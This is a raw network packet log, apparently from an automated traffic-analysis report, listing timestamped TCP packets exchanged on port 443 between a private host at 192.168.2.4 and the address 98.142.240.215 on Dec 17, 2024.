                                                                                                                                                                              Dec 17, 2024 18:12:46.888062000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.888120890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.890398979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.890470982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.890476942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.890527964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.892652035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.892724037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.892730951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.892792940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.895030022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.895117998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.895123959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.895174026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.052217960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.052314043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.052349091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.052401066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.054240942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.054311037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.054326057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.054377079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.056571960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.056654930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.056668043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.056719065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.058912039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.058984041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.058996916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.059048891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.062130928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.062215090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.062228918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.062280893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.064419031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.064495087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.064507961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.064559937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.065958977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.066035986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.066049099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.066107035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.069065094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.069152117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.069165945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.069221020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.071373940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.071491957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.071505070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.071557999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.072900057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.072984934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.072997093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.073059082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.076066971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.076143026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.076155901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.076209068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.078350067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.078437090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.078449011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.078511000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.080713987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.080807924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.080822945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.080878973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.083050966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.083148956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.083162069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.083235979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.085356951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.085431099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.085443974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.085495949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.087646961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.087713957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.087728024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.087778091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.244283915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.244399071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.244466066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.244611979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.247253895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.247347116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.247361898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.247419119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.249819040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.249914885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.249927998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.249985933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.251307011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.251379013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.251393080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.251452923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.253467083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.253536940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.253551006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.253609896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.256752968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.256828070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.256840944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.256910086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.258951902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.259023905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.259037018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.259092093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.260401964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.260473013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.260484934 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.260536909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.263513088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.263585091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.263598919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.263659000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.265841007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.265913963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.265925884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.265978098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.267396927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.267469883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.267482996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.267534018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.270473003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.270545006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.270558119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.270632982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.272803068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.272922993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.272936106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.272993088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.275127888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.275202990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.275214911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.275269985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.277586937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.277656078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.277668953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.277896881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.279784918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.279855967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.279867887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.279920101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.436470985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.436708927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.436739922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.436816931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.439384937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.439471006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.439486027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.439543962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.441660881 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.441740036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.441752911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.441806078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.443953991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.444031000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.444045067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.444096088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.445617914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.445692062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.445705891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.445755005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.448699951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.448777914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.448791027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.448858976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.451072931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.451153994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.451167107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.451217890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.453320980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.453398943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.453411102 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.453468084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.455599070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.455682039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.455694914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.455745935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.457910061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.457988024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.457999945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.458050966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.460222960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.460302114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.460314989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.460382938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.462569952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.462683916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.462697029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.462764025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.464955091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.465033054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.465045929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.465096951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.467231989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.467308044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.467336893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.467391014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.469636917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.469713926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.469727039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.469779015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.471911907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.471990108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.472002983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.472071886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.628463030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.628587008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.628613949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.628658056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.631498098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.631584883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.631597042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.631642103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.633887053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.633966923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.633975983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.634027958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.636141062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.636234045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.636244059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.636296988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.639254093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.639338970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.639348984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.639415979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:47.639450073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.639492035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.639576912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:47.639626980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:54.212821960 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:54.212871075 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:54.213041067 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:54.213356018 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:54.213366032 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:55.544924974 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:55.545265913 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:55.565411091 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:55.565434933 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:55.565826893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:55.565921068 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:55.566318035 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:55.607384920 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.023185015 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.023228884 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.023276091 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.023294926 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.023333073 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.023399115 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.135893106 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.136068106 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.225872993 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.226057053 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.258059025 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.258229017 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.280358076 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.280689955 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.296622038 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.296725035 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.452670097 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.452830076 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.465765953 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.465930939 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.475053072 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.475177050 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.487416029 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.487545013 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.496748924 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.496865988 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.506216049 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.506705046 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.515588999 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.515714884 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.638950109 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.639194012 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.647727966 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.647800922 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.658166885 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.658323050 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.666344881 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.666457891 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.675041914 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.675267935 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.682687044 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.682760000 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.693762064 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.693964958 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.701380014 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.701458931 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.709623098 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.709841013 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.717562914 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.717757940 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.728246927 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.728324890 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.736480951 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.736598969 CET49738443192.168.2.498.142.240.215
